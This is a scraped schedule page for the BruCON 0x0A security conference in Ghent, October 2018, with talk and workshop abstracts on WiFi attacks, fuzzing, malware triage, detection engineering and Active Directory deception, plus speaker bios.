Loading…
BruCON 0x0A has ended

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

Wednesday, October 3
 

08:30

Registration & Breakfast
Wednesday October 3, 2018 08:30 - 10:00
00. Lounge University

10:00

BruCON Retro Opening
The original BruCON founders and the current crew will reminisce over the BruCON history!

Speakers:
Founders:
Philippe Bogaerts, Pieter Danhieux, Seba Deleersnyder, Benny Ketelslegers and Filip Waeytens

Current crew:
Philippe Bogaerts, Koen Burms, Stephen Corbiaux, Matt Erasmus, Tom Gilis, Xavier Mertens, Jochen Raymaekers, Pieter Van Goethem, Larry Vandenaweele, Stephanie Vanroelen, Bertrand Varlet and Marijke Vinck.

Wednesday October 3, 2018 10:00 - 10:30
01. Westvleteren University

10:30

Advanced WiFi Attacks using Commodity Hardware
This talk explains how low-layer attacks against WiFi can be implemented by modifying the firmware of off-the-shelf WiFi dongles. Additionally, in this new version of the talk, we also discuss how mobile phones can be modified to carry out similar attacks.

First, we show how to give ourselves a higher throughput than normally allowed. Then we create a continuous jammer which makes the channel completely unusable for all devices. Based on this we also show how to implement a selective jammer, allowing one to jam only packets of specific clients. It’s surprising all this is possible using cheap hardware, in particular the selective jammer, since it must adhere to very strict timing constraints to timely jam the targeted frames.

Finally, we demonstrate how our low-layer attacks facilitate attacks against higher-layer protocols. In particular we use our modified firmware to implement a multi-channel man-in-the-middle attack. This can then be used to attack WPA-TKIP. In this new version of the talk we also discuss how this MitM position was used in the KRACK attacks against WPA2, and several other attacks against protected Wi-Fi networks.

Speakers
avatar for Mathy Vanhoef

Mathy Vanhoef

Mathy Vanhoef is a postdoctoral researcher at KU Leuven. He is mostwell known for his KRACK attack against WPA2, and the RC4 NOMORE attackagainst RC4. His research interest is in computer security with a focuson wireless security (e.g. Wi-Fi), network protocols, appliedcryptography... Read More →


Wednesday October 3, 2018 10:30 - 11:30
01. Westvleteren University

11:30

Hacking driverless vehicles
-----
Hacking Driverless Vehicles
-----
Are driverless vehicles ripe for the hacking? Autonomous and unmanned
systems are already patrolling our skies and oceans and being tested on
our streets and highways. Pioneering tests of autonomous vehicles were
performed in Europe and all trends indicate these systems are at an
inflection point that will show them rapidly becoming commonplace. It is
therefore a salient time for a discussion of the capabilities and
potential vulnerabilities of these systems.

This session will be an informative and amusing look at the current
state of civil driverless vehicles and what hackers or other miscreants
might do to mess with them. Topics covered will include common sensors,
decision profiles and their potential failure modes that could be
exploited. With this talk Zoz aims to both inspire unmanned vehicle fans
to think about robustness to adversarial and malicious scenarios, and to
give the paranoid false hope of resisting the robot revolution. The talk
will also contain brand new information from conversations with the US
Department of Transportation including insights into the new Connected
Vehicle and Vehicle To Vehicle Communications programs that may be
hacking-relevant well before the adoption of fully autonomous cars and
other vehicles.
-----

Speakers
avatar for ZoZ

ZoZ

Zoz is a robotics interface designer and rapid prototyping specialist.He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSkyin San Francisco.  As co-host of the Discovery Channel show 'PrototypeThis!' he pioneered urban pizza delivery with robotic vehicles,including... Read More →


Wednesday October 3, 2018 11:30 - 12:30
01. Westvleteren University

12:30

Lunch
Wednesday October 3, 2018 12:30 - 13:30
00. Lounge University

13:30

(Re)Investigating Powershell attacks
At BruCon 2014, we presented “Investigating PowerShell Attacks” at what ended up being the precipice of widespread adoption and abuse of PowerShell in the wild. A year later, we examined how PowerShell Desired State Configuration (DSC) provided further avenues for covert persistence and C2. In this presentation, we’ll look at how these offensive techniques - and the corresponding approaches to detection and response - have evolved.


Wednesday October 3, 2018 13:30 - 14:30
01. Westvleteren University

14:30

Levelling Up Security @ Riot Games
In this talk, Mark will be discussing his 5+ years at Riot Games where the InfoSec team has developed a security program (https://engineering.riotgames.com/news/evolution-security-riot)
based on feedback and self-service, across a truly hybrid infrastructure.

Starting with a recap of his 2015 BruCON talk (Feedback Security), Mark will dive into where the team failed and succeeded in the years since the talk. He will dive into areas such as:

- internal RFCs
- developer education & collaboration on solutions
- receiving feedback when the team don't hit the bar and acting on it
- in-house tools designed and developed to provide visibility into the security posture of AWS
- open-sourcing tools and contributing to other open-source projects 

An attendee should:

- see some pretty cool art (not created by Mark, obviously)
- understand where the Riot InfoSec team failed and succeeded
- learn about a self-service, feedback-driven approach to security, where the InfoSec team is embraced, not hated

Disclaimer :: There will be no cool exploits, 0days or buffer overloads in this talk.

Speakers
avatar for Mark Hillick

Mark Hillick

Mark leads Player Security at Riot Games, makers of League Legends. Prior to moving to the US, Mark built and led Riot’s InfoSec team in Europe. At Riot, he has done everything from building teams, occasional engineering, levelling up the security program, dealing with DDoS attacks... Read More →


Wednesday October 3, 2018 14:30 - 15:30
01. Westvleteren University

15:30

Coffee Break
Wednesday October 3, 2018 15:30 - 16:00
00. Lounge University

16:00

Social engineering for penetration testers
2009 talk overview:
In recent years, people have become more familiar with the term "social engineering", the use of deception or impersonation to gain unauthorised access to resources from computer networks to buildings. Does this mean that there are fewer successful social engineering attacks? Probably not.
In fact, because computer security is becoming more sophisticated and more difficult to break (although this is still very possible) more and more people are resorting to social engineering techniques as a means of gaining access to an organisations' resources. Logical security is at a much greater risk of being compromised if physical security is weak and security awareness is low. Performing a social engineering test on an organisation gives a good indication of the effectiveness of current physical security controls and the staff's level of security awareness. But once you have decided to perform a social engineering test, where do you start? How do you actually conduct a social engineering test?

2018 talk overview:
It’s 2018 and we can’t get enough social engineering.  People are still falling for social engineering scams and criminals are using more social engineering techniques than ever.  On the plus side, social engineering testers are busier than ever too.  So how do you actually conduct a social engineering test in 2018? Has much changed over the past decade? Thanks to recycling, dumpster diving is a lot less disgusting, that’s for sure.  Come and hear what else has changed from someone who has been delivering social engineering tests since before Brucon existed.

Speakers
avatar for Sharon Conheady

Sharon Conheady

Sharon Conheady is the director of First Defence Information Security (www.firstdefenceis.com) and a founding member of The Risk Avengers (www.riskavengers.co.uk). She specialises in the human side of security and has social engineered her way into dozens of organisations across the UK and abroad, including company offices, sports stadiums, government facilities and more. Sharon is a regular speaker at security events and has appeared as... Read More →


Wednesday October 3, 2018 16:00 - 17:00
01. Westvleteren University

17:00

The 99c heart surgeon dilemma
Let's assume you need heart sugery. I hope you don't, but let's just stick with it for a minute. How much would you be willing for someone to fix it and who would you hire to do it? If you are a suicidal emo kid, please do not answer, you are ruining the point here. Here's the thing: People want someone suitable and knowledgeable to cut them open and sew them up again and they are willing to pay good money for it. Here are two things you don't want to do:

1) You don't want to hire some old drunk with a pocket knife and a sewing kit from the dollar shop which claims to fix your heart for 100 bucks.

2) You don't want to hire the same guy for 100'000 bucks when he's wearing a white coat and got shiny high tech tools because the last guy paid in advance...

What does this have to do with penetration testing? More than we like, unfortunately. I have met companies that invested thousands of dollars, expecting a pentest and getting a spiced up Nessus report as a result. More subtle nuances of "crappy pentest" might overlook essential threats and leave customers at risk with a false sense of security.

This talk will explore the common mistakes made when performing pentests, which includes the test itself, as well as pre- and post-engagement matters. Also, it applies for testers and customers alike. Also, it might help saving the rainforests.

While revisiting this talk from 2011, we will look into the question: Have things changed for the better and do we still face the same issues?

Speakers
avatar for Stefan Friedli

Stefan Friedli

Stefan Friedli has been working in infosec since 2003 after wasting his teenage years on assembler and shareware nag screen. He is a well-known face in the European Infosec Community. As a speaker at various conferences, co-founder of the Penetration Testing Execution Standard as... Read More →


Wednesday October 3, 2018 17:00 - 18:00
01. Westvleteren University

18:30

Nerdland podcast recording
For our tenth anniversary we have arranged a special event to supplement our standard conference track. On October 3rd, from 7:00 PM – 8:00 PM, one of Belgium’s most popular podcasts will be recorded in the main auditorium “Westvleteren” at the BruCON venue. As of 6:30 PM, there will be free entrance so anybody can join !

The Lieven Scheire’s Nerdland podcast brings together a bunch of nerdy science freaks to share the most important science news of the past month. Interesting science facts put forward in a hilarious manner. With cyber security as a recurring topic on the show, we are sure you will like it just as much as the BruCON Crew does.

After the usual conference track the bar will remain open, and a sandwich dinner will be foreseen at the venue for anyone who wishes to sit in the live audience.


Language spoken: English
More info : https://soundcloud.com/lieven-scheire Twitter : @lievenscheire                   

Speakers

Wednesday October 3, 2018 18:30 - 20:00
01. Westvleteren University

19:00

Mentor/Mentee
With this initiative we want to provide a stepping stone for people who are new to the infosec community or are just in need of finding a mentor or providing guidance.
During this event you can choose to be a Mentor or a Mentee or even both.
Mentors are typically seasoned professionals, having done quite some miles on the professional infosec road, and are willing to provide advice to the Mentees.
This advice can vary from Mentee to Mentee, but could include: which training should I follow, what are key messages you can give based on personal experience, how do I get to know new people, whom to follow on Twitter, general advice to survive in this industry, to help with presenations and much more. Mentees, can be people who are fairly new to the security scene, or a willing to receive advice from more seasoned professionals.
We all started at some point in time within this industry, and we have all had our challenges. With this programme we want to close this gap and create a stronger bond between seasoned professionals and people new to the industry.

The Mentor/Mentee programme is a initiative that can vary in duration. For some this might be a one-off event, but for others this might create a bond with a mentor that will last.
Please join us from 19 (7 PM) until 21 (9 PM) at the Novotel Bar.
Be sure to use the mentor / mentee stickers to indicate the role you want to play.

Wednesday October 3, 2018 19:00 - 22:00
Novotel Novotel Ghent
 
Thursday, October 4
 

08:30

Registration & Breakfast
Thursday October 4, 2018 08:30 - 10:00
00. Lounge University

09:45

BruCON Opening
Thursday October 4, 2018 09:45 - 10:00
01. Westvleteren University

10:00

Keynote - When Lemon Markets, Imposter Syndrome & Dunning–Kruger collide
A talk on why we struggle to secure organizations, or build useful security products (and how we can do better).

Speakers
avatar for Haroon Meer

Haroon Meer

Haroon Meer is the founder of Thinkst, the company behind the well loved Thinkst Canary. Haroon has contributed to several books on information security and has published a number of papers and tools on various topics related to the field. Over the past decade (and a half) he has... Read More →


Thursday October 4, 2018 10:00 - 11:00
01. Westvleteren University

10:00

ICS and IoT Village
Thursday October 4, 2018 10:00 - 19:00
02. Westmalle University

10:30

Introduction to Bro Network Security Monitor
Limited Capacity filling up

Bro is an open-source Network Security Monitor (NSM) and analytics platform. Even though it has been around since the mid 90's, its main user base was primarily universities, research labs and supercomputing centers. In the past few years, however, more and more security professionals in the industry turned their attention to this powerful tool, as it runs on commodity hardware, thus providing a low-cost alternative to commercial solutions. 

At its core, Bro inspects traffic and creates an extensive set of well-structured, tab-separated log files that record a network’s activity. Nonetheless, Bro is a lot more than just a traditional signature-based IDS. While it supports such standard functionality as well, Bro’s scripting language allows security analysts to perform arbitrary analysis tasks such as extracting files from sessions, detecting malware by interfacing with an external source, detecting brute-forcing, etc. It comes with a large set of pre-built standard libraries, just like Python. 

During this two-hour workshop, we will learn about Bro's capabilities and cover the following topics: 
- Introduction to Bro 
- Bro architecture 
- Bro events and logs 
- Bro signatures 
- Bro scripting 
- Bro and ELK 

Speakers
avatar for Eva Szilagyi

Eva Szilagyi

CEO, Alzette Information Security
Eva Szilagyi is managing partner and CEO of Alzette Information Security, a consulting company based in Luxembourg. She has more than 8 years of professional experience in penetration testing, security source code review, digital forensics, IT auditing, telecommunication networks... Read More →
avatar for David Szili

David Szili

CTO, Alzette Information Security
David Szili is managing partner and CTO of Alzette Information Security, a consulting company based in Luxembourg. He has more than 8 years of professional experience in penetration testing, red teaming, vulnerability assessment, vulnerability management, security monitoring, security... Read More →


Thursday October 4, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Python Toolsmithing 101
Limited Capacity filling up

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers
avatar for Didier Stevens

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You... Read More →


Thursday October 4, 2018 10:30 - 12:30
04. Orval Novotel

10:30

Simplifying the art of instrumentation
Limited Capacity full

1. Source instrumentation & Binary instrumentation

2. Static
    a. Compile time instrumentation
        i. LLVM
        ii. AFL instrumentation use case
    b. Binary rewriting

3. Dynamic instrumentation
    a. Introduction
    b. PIN
    c. Dynamo Rio
    d. DynInst

4. Application of instrumentation in the domain of security:
    a. Coverage tracing
    b. Aiding reverse engineering
    c. Vulnerability discovery
    d. Malware analysis
    e. Taint analysis
    f. Debugging
    g. Data flow analysis
    h. Control flow analysis

Speakers
avatar for Rushikesh D. Nandedkar

Rushikesh D. Nandedkar

Rushikesh is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014, BruCON... Read More →
avatar for Krishnakant B. Patil

Krishnakant B. Patil

Krishnakant: is a vulnerability researcher by profession. Yet, he is best known amongst the security researchers for his cutting edge capabilities and skills in reverse engineering, exploit development and malware analysis. He had successfully conducted many workshops and hands on... Read More →


Thursday October 4, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore! (Short Version)
Limited Capacity filling up

The cyber attack landscape has changed.  Malicious adversaries continue to enhance techniques used to exploit enterprise networks.  A key ingredient missing from our cyber experts is a better way to hunt for adversarial presence.  The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release a new frameworks called Excalibur TIE Mark I, and Themis Network Analyzer that allows investigators to better way to hunt for new threats in real-time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts both from each host machine and directly from the enterprise network.  This system develops real indicators of compromise (IOC) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented with algorithms used to analyze, correlate, and produce IOCs allowing the investigator to better hunt for new threats, populate uniform data sets best for information dissemination and analysis, and create new visualization graphs used for the human to derive meaning from vast amounts of data aggregation.  Finally, this talk applies everything we’ve learned and shows how to create new distributed network sensors and deploy IOCs discovered from the Threat Intelligence Engine to better protect the enterprise network.  Rest assured, lots of live demos are included in this talk.  And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers
avatar for Solomon Sonya

Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms... Read More →


Thursday October 4, 2018 10:30 - 12:30
06. Rochefort Novotel

11:00

Reversing Industrial Protocols – Real World Use Cases (From zero to control in 10 minutes)
XiaK (http://security.xiak.be/en) or Center of Expertise for Industrial Automation in Kortrijk, Belgium is a research group of the Ghent University.
Recently (3 years ago), a new project was started concerning Industrial Security. Main topic: create awareness for implementing in-depth network segmentation and security by demonstrating old and new vulnerabilities on commonly used industrial devices.

These include the known problems on Siemens PLC’s or common switches and demonstrating sniffing, MitM etc …
But foremost, since the target audience is Belgium and the SME’s therein, the most used industrial hardware for this region is actually a trilogy of Siemens, Beckhoff and Phoenix Contact. All three are major and large OEM’s that (should) have security as one of their concerns…

Speakers
avatar for Tijl Deneut

Tijl Deneut

Tijl Deneut has over 5 years of experience in the IT security sector and is, amongstEthical Hacker and an active EC-Council Certified Instructor. Tijl also teachesthe Howest University College and the Ghent University, where he also leads severalresearch projects. He has had the privilege... Read More →


Thursday October 4, 2018 11:00 - 11:30
02. Westmalle University

11:00

Finding 0days in embedded systems with code coverage guided fuzzing
Coverage guided fuzzing becomes a trending technique to discover vulnerabilities in powerful systems such as PC, and is a main contributor to countless 0days in the last few years. 

Unfortunately, this breakthrough methodology is not yet applied to find bugs in embedded devices (like network routers, IP cameras, etc). We found some of the reasons as follows: 

- As closed ecosystems, embedded devices usually come without built-in shell access or development facilities such as compiler & debugger. This makes it impossible to introduce a fuzzer to directly run & find bugs inside them. 

- In case available for download (rarely), most embedded firmware are not open source, which limit usage of available guided fuzzers such as AFL & LibFuzzer, as these tools require source code to inject basic block instrumentation at compile time. 

- Most existing work focus on Intel architecture, while all embedded devices run on other CPUs such as ARM, MIPS or PowerPC. Our study reveals that fuzzing tools on these architectures are sorely lacking. 

This research aims to overcome the mentioned issues to build a new guided fuzzer for embedded systems. 

- We emulate the firmware so we can put in our fuzzing & debugging tools. We will first explain how we directly extract firmware from physical devices, then emulate them in Virtual Machine with a lot of tricks involving static binary dependency duplication, patching firmware for NVRAM simulation in order to feed actual response for program configuration. 

- We will introduce a new lightweight dynamic binary instrumentation (DBI) framework that supports all platforms & embedded architectures in use today, including Arm, Arm64, Mips, PowerPC & Sparc (plus, we also support Intel X86). The design & implementation of this framework will be presented in details, so the audience can also see many other applications of our DBI beyond this project. 

- We will discuss how we built a powerful guided fuzzer to run inside emulated firmware. Using our own DBI at the heart for basic block instrumentation, this requires no firmware source code, and can find vulnerabilities in binary-only applications on all kind of embedded CPUs available. 

In a limited time of just few months, our fuzzer discovered many 0days in some widely popular embedded network devices. Among them, several vulnerabilities allow pre-authenticated remote code execution that affect multi-million users, and can be potentially turned into a new botnet-worm with massive-scale infection. These bugs will be released to public in our talk if the vendors fix them in time. 

The audience can expect a deeply technical, but still entertaining presentation, with many exciting demos.

Speakers
avatar for Quynh Nguyen Anh

Quynh Nguyen Anh

Dr.Nguyen Anh Quynh is a regular speaker at industrial information security conferences such as Blackhat USA/Europe/Asia, DEFCON, RECON, Syscan, HackInTheBox, Shakacon, Opcde, ZeroNights, Hack.lu, Deepsec, XCon, Confidence, Hitcon, Eusecwest, etc. He also presented his researches... Read More →
avatar for Lau Kai Jern

Lau Kai Jern

KaiJern, Lau (xwings) is the IoT/Blockchain researcher at JD Security (JD.COM), Advisor for UnicornTeam/HACKNOWN Team and also Hack In The Box Security Conference core crew. His research topic mainly on hardware and software of embedded device, blockchain security, reverse engineering... Read More →


Thursday October 4, 2018 11:00 - 12:00
01. Westvleteren University

12:00

$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase
Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach. 

As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.

Speakers
avatar for Daniel Bohannon

Daniel Bohannon

 Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously... Read More →
avatar for Matthew Dunwoody

Matthew Dunwoody

Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously... Read More →


Thursday October 4, 2018 12:00 - 13:00
01. Westvleteren University

13:00

Lunch
Thursday October 4, 2018 13:00 - 14:00
00. Lounge University

13:30

Python Toolsmithing 101
Limited Capacity filling up

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers
avatar for Didier Stevens

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You... Read More →


Thursday October 4, 2018 13:30 - 15:30
06. Rochefort Novotel

13:30

Developing Resilient Detections (with Obfuscation & Evasion in Mind)
Limited Capacity filling up

WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speeds. Attackers begin using these techniques within hours of their release. However, defenders often spend days, weeks or months identifying and reactively creating signatures for these techniques. Often these reactive signatures are overly rigid; therefore, they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM - System Resource Usage Monitor, etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures

The author has several years of real-world experience creating, tuning and enriching real-time detections that run on 10+ million endpoints in 100's of environments around the world. This firsthand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios – concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.

Speakers
avatar for Daniel Bohannon

Daniel Bohannon

 Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously... Read More →


Thursday October 4, 2018 13:30 - 17:30
03. Chimay Novotel

13:30

Finding security vulnerabilities with modern fuzzing techniques
Limited Capacity full

Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints according common problems and pitfalls during fuzzing will be given. After discussing the theories behind modern fuzzing techniques we look at famouse fuzzers and how they can be used to find real-world vulnerabilities. In the second part important areas which influent the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
avatar for Rene Freingruber

Rene Freingruber

Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He operates research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques... Read More →


Thursday October 4, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

Malware Triage: Analyzing Malscripts – Return of The Exploits!
Limited Capacity full

In recent years malscripts and file based exploits have become a main delivery method for malware. Malscripts are often heavily obfuscated and they can take many different forms including WScript, Javascript, macros, and PowerShell. There has also been been a rise in document based exploits used to deliver and execute these malscripts. As a result incident responders and malware analysts need to be comfortable analyzing different document formats, identifying potential exploits, and analyze malscripts.

In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts, and a final malware payload. During this process you will be exposed to different document based exploits, and you will practice the skills required to manually analyze malscripts. This workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating, and analyzing maldocs and malscripts. However, we will also provide an introduction to automaton tools and techniques that can be used to speed up the analysis process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript, and Javascript, and you are familiar with windows internals you should have no problem completing the workshop.

You will be provided with a VirtualMachine to use during the workshop, please make sure to bring a laptop that meets the following requirements. Your laptop must have VirtualBox installed and working (VMWare is not supported). Your laptop must have at least 60GB of disk space free, preferably 100GB. Your laptop must be able to mount USB storage devices. Make sure you have the appropriate dongle if you need one.

Speakers
avatar for Sergei Frankoff

Sergei Frankoff

Twitter: @herrcore YouTube: https://www.youtube.com/oalabs Sergei is a co-founder of Open Analysis, and volunteers as a malware researcher. When he is not reverse engineering malware Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer... Read More →
avatar for Sean Wilson

Sean Wilson

Twitter: @seanmw YouTube: https://www.youtube.com/oalabs Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open... Read More →


Thursday October 4, 2018 13:30 - 17:30
04. Orval Novotel

14:00

All Your Cloud Are Belong To Us – Hunting Compromise in Azure
MongoDB, Redis, Elastic, Hadoop, SMBv1, IIS6.0, Samba. What do they all have in common? Thousands of them were pwned. In Azure. In 2017. 

Attackers have shifted tactics, incorporated nation-state leaked tools and are leveraging ransomware to monetize their attacks. Cloud networks are prime targets; the DMZ is gone, the firewall doesn't exist and customers may not realize they've exposed insecure services to the Internet until it's too late. 

In this talk I'll discuss hunting, finding and remediating compromised customer systems in Azure - a non-trivial task with 1.59million exposed hosts and counting. Remediating system compromise is only the first stage so we'll also cover how we applied the lessons learned to proactively secure Azure Marketplace. 

Finally, I will present research I've done into the default security configuration of Azure & AWS Marketplace images and present a call to action for teams working on Azure security offerings

Speakers
avatar for Nate Warfield

Nate Warfield

Nate Warfield is a Senior Security Program Manager for the Microsoft Security Response Center. He spent nearly 20 years designing, building and troubleshooting enterprise & carrier-grade networks for Fortune 500 companies while simultaneously moonlighting as a Grey Hat. He learned... Read More →


Thursday October 4, 2018 14:00 - 15:00
01. Westvleteren University

15:00

Forging Trusts for Deception in Active Directory
Using Deception for defence in Active Directory is very fruitful. It makes it possible to target multiple phases of an adversary’s attack methodology. While attacking an enterprise network, adversaries generally enumerate the AD trusts. It is important for them to map the relationships and trusts between domains and forests as it helps in lateral movement and post exploitation. 

This talk discusses forging and implanting computers, domain and forest objects in an AD environment. Such objects target the attacker mind-set and methodology by providing easy yet high value targets. We will see how this deception technique traps an adversary across an enterprise attack cycle. 

Open source scripts for deployment of discussed techniques will also be discussed during the talk. The talk will be full of live demonstrations. 

Speakers
avatar for Nikhil Mittal

Nikhil Mittal

Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security... Read More →


Thursday October 4, 2018 15:00 - 16:00
01. Westvleteren University

15:45

A goldmine within an ocean of data – basics of network forensics
Limited Capacity full

/!\ Important Notice /!\

For The workshop, the participants are requested to download the SOF-ELK Virtual Machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding usefull things in this stream can be overwelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finalize we'll tackle the subject of automating the process.

Speakers
avatar for Andy Deweirt

Andy Deweirt

I’m a security consultant with over 10 year of experience in infosecurity. I've built firewalls, architected solutions, tested security, broke infrastructure and built soc capabilities, A main thread within the multiple roles and assignments has mostly been network security. As... Read More →


Thursday October 4, 2018 15:45 - 17:45
06. Rochefort Novotel

16:00

Coffee Break
Thursday October 4, 2018 16:00 - 16:30
00. Lounge University

16:30

Disrupting the Kill Chain
Disrupting the Kill Chain is a defender’s approach to minimizing cyber-adversary access and success in a Windows environment. It builds upon my previous work on ‘Defending a Microsoft Environment at scale’ which spoke to the innovations made in Windows 10 and the capabilities of a native Microsoft stack to launch a capable defense against most vulnerability classes. This talk is a bluebook of the most effective and efficient controls in Windows 10 and an associated Microsoft environment to disrupt the kill chain. 

This talk focuses on leveraging capabilities of a Microsoft stack to launch a capable defense against most vulnerability classes. It starts out by describing the Lockheed Martin kill chain in conjunction with the MITRE ATTACK framework and explains how it has been used by us to build a defense model. We then dwell into specific capabilities of the Windows subsystem to detect and respond to the various stages of an attack lifecycle including: Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Execution, Collection, Exfiltration and Command and Control (C2). 

As we continue, we describe a working defense model that dwells into some of the more effective and efficient controls in a Windows 10 ecosystem that address several categories of attacks. These higher efficiency controls are detailed in a few sample deployment guides that are made available on Github and based upon a “single platform approach” I’ve previously described in my other talks. As we continue, we talk about the different ways in which logging, and monitoring data can be collected and analyzed at scale. We talk about implementations that extrapolate the telemetry from these indicators across Microsoft Windows to an enterprise view that reduces noise and improves signal. In order to do this, we explain how WEF works, a sample Sysmon deployment guide and how to collect rich event meta-data from all Windows Event Log sources to build correlation and finally the more recent technique of log collection and hunting using Windows Defender telemetry data. We don’t address the traditional SIEM implementations but talk about specific use cases that address the MITRE ATTACK framework. (Samples of such an approach are visible in my previous talks detailed here between Pages 16-25). 
